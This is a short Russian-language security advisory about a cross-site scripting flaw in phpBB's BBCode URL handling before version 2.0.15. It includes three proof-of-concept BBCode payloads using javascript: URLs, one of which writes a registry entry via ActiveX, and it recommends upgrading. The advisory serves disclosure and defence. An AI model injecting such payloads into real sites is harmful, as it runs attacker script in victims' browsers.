Security Lab

Межсайтовый скриптинг в при обработке BBCODE URL в phpBB

Дата публикации:06.06.2005
Всего просмотров:3707
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: phpBB версии до 2.0.15

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

[url=javascript://%0ASh=alert(%22CouCou%22);
window.close();]Alert box with "CouCou"[/url]

[url=javascript://%0ASh=new%20ActiveXObject
(%22WScript.shell%22);Sh.regwrite(%22HKCU
%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou
%22);window.close();]Create registry entry:
HKCU\QQQQQ\qq = "CouCou"[/url]

[url=javascript://%0Awindow.opener.document.body.
innerHTML=window.opener.document.body.innerHTML.
replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();]Modify opener page: Paul -> P.A.U.L[/url]

URL производителя: www.phpbb.com

Решение: Установите последнюю версию (2.0.15) с сайта производителя.

Ссылки: CastleCops phpBB bbcode Input Validation Disclosure